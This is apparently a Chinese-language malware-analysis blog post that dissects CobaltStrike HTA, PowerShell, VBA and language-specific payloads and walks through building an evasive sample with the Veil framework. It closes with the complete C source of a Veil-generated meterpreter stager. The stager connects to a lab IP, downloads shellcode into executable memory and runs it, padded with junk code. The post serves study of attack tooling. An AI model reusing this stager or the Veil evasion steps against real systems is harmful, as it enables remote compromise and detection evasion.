概述
在上一节的的文章了,笔者对CobaltStrike的基本使用和PE样本进行了一个概要的分析。通过上一小节的内容,可了解CobaltStrike的基本原理和代码解密上线方法。在本节中,笔者将会对CobaltStrike其他类型的恶意样本进行一个分析。
由于foreign协议和beacon协议生成的样本解码方式相同,只是后续请求的方式不同,这里就不分开介绍了,只介绍beacon类型的样本。
HTML Application
CobaltStrike可生成三种类型的hta文件,分别是Executable、Powershell、VBA。
这三类样本的区别在于:
Executable 将会在hta文件中内嵌一个PE文件
Powershell 将会在hta文件中内嵌一段Powershell代码
VBA 将会在hta文件中内嵌一段VBA代码
Beacon_Executable
该类样本主要是创建一个包含VBScript的hta文件,在VBScript中,有一个硬编码的PE
脚本会在末尾将shellcode写入到evil_pe.exe中并通过Wscript.Shell加载执行
因此可以将这部分的shellcode赋值到010中保存为exe文件:
保存出来的pe是只有14kb,初步估计是上一小节分析过的加载器。
经过分析,可以确定该样本是CobaltStrike的的分段Payload加载器
Powershell
相比之下,Powershell类型的hta内嵌的shellcode体积就要小很多
该段Powershell代码主要是用于解密并执行中间一段base64编码的代码,中间的代码解码之后如下:
解码之后的Powershell依旧是解码执行base64编码的代码,不同的是,此次解码出来的将会是一个数据流,在后面解压缩执行。
所以可以将该段Powershell指令赋值到ps中执行,得到执行结果。
最后的这段Powershell代码首先会在末尾处通过[IntPtr]::size -eq 8 以判断当前的操作系统是32还是64位。若当前程序是64位,则以32位的模式启动。
这里调试ps1文件,直接将shellcode写入到2.txt中:
写入到1.txt中的内容还是一段Powershell指令,代码如下:
写入之后格式如下,写个简单的python脚本格式化即可
格式化出来之后可以发现这里的shellcode其实就是分段Payload中解密出来用于下载后续Payload的shellcode
VBA
内嵌VBA代码的hta相比前两类就要复杂一些
VBA类的hta主要是在hta中通过VBScript创建一个excel对象并填充恶意宏代码执行。
代码首先通过CreateBoject 创建了一个 Excel.Application对象并更改其可见属性为False
接着程序创建一个WscriptShell对象用于操作注册表,主要是添加宏的安全属性
准备工作完成之后,程序会给Excel对象添加工作表并且将宏代码填充进去:
最后通过Auto_Open方法调用宏:
所以可以直接在excel中创建一个宏对象,将hat文件中的宏代码拷贝过去调试,记得位置需要选择到当前的文档,而不是应用到所有模板
但是将宏代码插入到excel之前需要先把一些没用的代码给替换掉,原始代码如下,经过简单分析,可以知道每个符号分别应该替换为多少,并且直接将cha(xx)的形式替换为对应的符号,这个过程可以手动替换,也可以直接编写一个python脚本进行替换。
完全替换并格式化后的宏代码应该如下:
简单分析后可得知,宏代码中应该是编码了一段hex数据流,宏代码会将这段数据流读解码后读取到内存并通过rundll32加载执行
加载方式是直接写入内存
所以可以调试到 res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) 的时候使用火绒剑查看rundll32.exe的进程信息,找到写入的进程地址,本例中为851968,将其转换为16进制得到d0000
获取到写入的地址之后,可以直接在火绒剑里面右键,查看进程信息,转到线程,双击之后,在内存查看窗口中输入转换后的十六进制地址:d0000查看内存
跳转过来之后可以发现,这片内存的数据就是我们之前分析过的shellcode。由于火绒剑本身不带有内存dump的功能,想要dump这片内存可以使用其他的内存dump工具。
Payload
除了直接生成恶意样本,CobaltStrike还支持生成各种语言的Payload,包括了C、C#、Java、Python等常见语言
其中C、C#、JAVA、Perl、Python、Ruby、VBA等类型的Payload均为硬编码的shellcode,而这段shellcode之前已经看到过不止一次了。攻击者可以编写任意的加载器,将这段buf加载到内存中执行。
COM组件的sct文件和上面分析的HTML APPlication的VBA相似,均为创建一个excel对象将预定义的宏代码写入进去执行:
同样的,Powershell类型的Payload跟hta类型的Powershell解码出来保持一致:
Powershell_cmd类型的Payload会直接生成一行可执行的Powershell指令,该条指令用于执行一段base64编码的指令
该段base64解码之后还是一段Powershell指令,该段Powershell指令依旧用于执行base64编码后的指令
内层的base64字符串解码之后是一段压缩后的shellcode,程序会通过IO.Compression.GzipStream解压缩这段数据通过IEX加载执行,这和hta的Powershell保持一致。
至此,除Veil之外,CobaltStrike生成的所有Payload都已经看完,通过对各种payload的简单分析可以得知,CobaltStrike看起来可以生成多种类型的payload,但其实本质上,payload所加载的shellcode其实是基本都是cs的downloader。
Veil
在上一小节介绍了CobaltStrike生成的各类payload,唯独没有介绍Veil,是因为Veil并不是可直接投入使用的语言,而是一款和CobaltStrike配合使用的免杀框架。
CobaltStrike客户端可以生成Veil类型的payload,攻击者将该Payload传入到Veil框架中即可生成具有一定免杀性的样本。
在kali中安装Veil只需要在确保配置的源可用的情况下执行apt -y install veil 即可快速安装
安装之后执行/usr/share/veil/config/setup.sh —force —silent 进行配置:
配置完成,在命令行输入veil指令就可进入到Veil:
Veil主要是包含了Evasion和Ordnance两个免杀工具,其中Evasion是用作文件免杀,Ordnance可生成一段Veil的Shellcode。接下来将以一个简单的例子讲述Veil框架的样本生成:
Make Veil for Autoit
在命令行键入use 1选择Evasion工具,可查看Evasion支持的一些命令,其中list指令可列举出Evasion包含的所有类型的Payload,use指令可选择Payload,info 指令可查看Payload的相信信息。
键入list命令查看可配置的Payload列表
Veil的Evasion一共包含了41中Payload,其中包括autoit的shellcode注入、meterpreter后门、cs后门、golang版本的meterpreter后门、lua的shellcode注入、perl的shellcode注入、Powershell版本的meterpreter后门、python版
本的meterpreter后门、python的shellcode注入、ruby的meterpreter后门、ruby的shellcode注入等等。
键入info 1 或者info autoit/shellcode_inject/flat.py 可查看第一类Payload的详细信息:
根据回显信息可知,autoit的Payload可直接编译成可执行文件。所以键入use 1 生成一个autoit的Payload试试
键入generate准备生成样本,Evasion提供了5种方式的shellcode,分别是
- Ordnance(默认)
- MSFVenom (MSF的Payload)
- Custom shellcode String (自定义的shellcode)
- File With Shellcode(十六进制的shellcode文件)
- Binary file with shellcode(二进制形式的shellcode文件)
这里看看Veil框架自带的样本,于是键入1,选择默认方式生成,接下来程序会让用户选择直接生成原始payload还是生成编码后的payload
而这里的Encoders其实只有一个xor方式
为了对比生成的shellcode情况,这里键入use 6 选择不进行编码,可以看到坏字符为\x00,无编码方式,接下来只设置好lhost和lport之后,键入generate即可生成payload
最后键入文件名,即可在Veil的文件目录下生成对应的exe文件:
Veil Autoit
通过工具解析这个pe文件,将autoit脚本dump出来如下:
Autoit脚本本身较短,主要就是将先前在Veil控制台生成的那段shellcode注入到calc.exe中
Veil默认生成的shellcode和上一小节cs的shellcode风格类似,但是短小了很多
经过快速的验证可以得知,该段shellcode就是CobaltStrike中用于下载后续payload的shellcode:
回到Veil框架中来,刚才在生成autoit的样本时候,Veil提供了五个选项用于生成不同的shellcode,上面经过试验可知Veil默认的shellcode和CobaltStrike中对应,接下来看看MSFvenom选项的shellcode。
在配置shellcode时候选择 2- MSFVenom,选择msf的shellcode,根据提示键入对应的信息,最后程序会生成一个名为payload1.exe的利用文件:
将msfvenom方式生成的样本dump出来,发现注入方式相同,但是注入的shellcode有所改变
msfvenom的shellcode和CobaltStrike的基本一样,但是感觉要稳定一些
关于MSF的shellcode为什么和CobaltStrike的shellcode如此相似,笔者会在下一篇文章中进行详细的介绍。
由于2 3 4 三个选项都需要payload作为输入,这个暂且不进行分析。从选项5到选项8,均为c语言的meterpreter
Veil2meterpreter
选择c/meterpreter ,Veil自动配置好了LPORT,需要用户手动键入LHOST和Filename。
配置完成之后,生成payload的时候,Veil会自动创建源代码文件和可执行文件,分别放入compiled文件夹和source文件夹中。
打开source文件夹中的use5.exe.c可看到该payload生成的C语言源码:
格式化之后完整代码如下
#define _WIN32_WINNT 0x0500
#include <winsock2.h>
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
char* HTzuNvhCcP(char* s)
{
char *result = malloc(strlen(s)*2+1);
int i;
for (i=0;i<strlen(s)*2+1;i++)
{
result[i] = s[i/2];
result[i+1]=s[i/2];
}
result[i] = '\0';
return result;
}
char* OySGHDw(const char *t)
{
int length= strlen(t);
int i;
char* t2 = (char*)malloc((length+1) * sizeof(char));
for(i=0;i<length;i++)
{
t2[(length-1)-i]=t[i];
}
t2[length] = '\0';
return t2;
}
int xDEADohLQOWAzHd(char PRgNjrnBFiTU[])
{
int ALonTwgUnqVHeP=0;
int i;
for (i=0;i<strlen(PRgNjrnBFiTU);++i)
ALonTwgUnqVHeP += PRgNjrnBFiTU[i];
return (ALonTwgUnqVHeP % 256);
}
void MzItUPnp()
{
WORD pYUkbOS = MAKEWORD((0*4+2), (2*1+0));
WSADATA euQsZxqczZN;
if (WSAStartup(pYUkbOS, &euQsZxqczZN) < 0)
{
WSACleanup();
exit(1);
}
}
char* OZNtVHUJ()
{
char EqafcdrUDe[2322], lchzXusA[2322/2];
strcpy(EqafcdrUDe,"KsdJVurnXCZwEPwiYxMkTesCJnIcBzpzkbpihXhtoIKlPqSowe");
strcpy(lchzXusA,"WbxKqlvywkBPPFOwqjvVDYWNHzeRElhmgzEVedFMzzZIbLNYbN");
return OySGHDw(strcat( EqafcdrUDe, lchzXusA));
}
void MxzrqhwCGD(SOCKET HpKFhGTt)
{
closesocket(HpKFhGTt);
WSACleanup();
exit(1);
}
char* ezkJzCUX()
{
char *FoteTKotVa = HTzuNvhCcP("ntHkjiirjivMQLRcvIHfhkPRwprXXDMVwVCXKmYXzGjTKGqYtB");
return strstr( FoteTKotVa, "p" );
}
char* XqleexaJmujm()
{
srand (time(NULL));
int i;
char jXDHwTYg[] = "NpDPygsCZFz0fIlSQAO2c4xrb6vJYiWXGm1TVw3udUnkKa9EtBMLHjqheR58o7";
char* bMKWmB = malloc(5);
bMKWmB[4] = 0;
while (1<2)
{
for(i=0;i<3;++i)
{
bMKWmB[i] = jXDHwTYg[rand() % (sizeof(jXDHwTYg)-1)];
}
for(i=0;i<sizeof(jXDHwTYg);i++)
{
bMKWmB[3] = jXDHwTYg[i];
if (xDEADohLQOWAzHd(bMKWmB) == 92)
return bMKWmB;
}
} return 0;
}
char* UQVVQa()
{
char qofPBDITdyn[2322] = "QvAaOpKBiWlPPVDkezMgBtoUdUNQHsYSwKTqHAorZOwQkXnYjr";
char *FBvxORWoFORw = strupr(qofPBDITdyn);
return strlwr(FBvxORWoFORw);
}
SOCKET rGEiHkVJYjGbir()
{
struct hostent * Iaedcj;
struct sockaddr_in XIHDAdziTSd;
SOCKET rrlyFfRiscWV;
rrlyFfRiscWV = socket(AF_INET, SOCK_STREAM, 0);
if (rrlyFfRiscWV == INVALID_SOCKET)
MxzrqhwCGD(rrlyFfRiscWV);
Iaedcj = gethostbyname("192.168.230.129");
if (Iaedcj == NULL)
MxzrqhwCGD(rrlyFfRiscWV);
memcpy(&XIHDAdziTSd.sin_addr.s_addr, Iaedcj->h_addr, Iaedcj->h_length);
XIHDAdziTSd.sin_family = AF_INET;
XIHDAdziTSd.sin_port = htons((673*12+4));
if ( connect(rrlyFfRiscWV, (struct sockaddr *)&XIHDAdziTSd, sizeof(XIHDAdziTSd)) )
MxzrqhwCGD(rrlyFfRiscWV);
return rrlyFfRiscWV;
}
int main(int argc, char * argv[])
{
char * EcQtTd;
int i;
char* YGADVFvMCa[5463];
for (i = 0;i < 5463;++i)
YGADVFvMCa[i] = malloc (4182);
MzItUPnp();
char* WCficlPxKiWRYg[264];
SOCKET mpmACD = rGEiHkVJYjGbir();
for (i = 0;i < 264;++i)
WCficlPxKiWRYg[i] = malloc (2850);
char mwKObmvDwOIuJ[200];
sprintf(mwKObmvDwOIuJ, "GET /%s HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: 192.168.230.129:8080\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible;MSIE 6.1;Windows NT\r\n\r\n", XqleexaJmujm());
send(mpmACD,mwKObmvDwOIuJ, strlen( mwKObmvDwOIuJ ),0);
Sleep(300);
EcQtTd = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* AGwAhuoOYGFoNzq[9887];
for (i=0;i<5463;++i)
{
strcpy(YGADVFvMCa[i], OZNtVHUJ());
}
char * umWSfvQxRu = EcQtTd;
int XHuuVPORMriW;
do
{
XHuuVPORMriW = recv(mpmACD, umWSfvQxRu, 1024, 0);
umWSfvQxRu += XHuuVPORMriW;
}while ( XHuuVPORMriW > 0 );
for (i = 0;i < 9887;++i)
AGwAhuoOYGFoNzq[i] = malloc (4361);
for (i=0;i<264;++i)
{
strcpy(WCficlPxKiWRYg[i], ezkJzCUX());
}
closesocket(mpmACD);
WSACleanup();
((void (*)())strstr(EcQtTd, "\r\n\r\n") + 4)();
for (i=0;i<9887;++i)
{
strcpy(AGwAhuoOYGFoNzq[i], UQVVQa());
}
return 0;
}
由于 6 7 8三个选项只是请求协议不同,加载方式还是大同小异的,这里就不分别对后面的进行生成和分析了。
不过关于Veil生成的meterpreter还是比较有意思的,本文篇幅至此,若是下一篇有机会的话将其完整分析补上。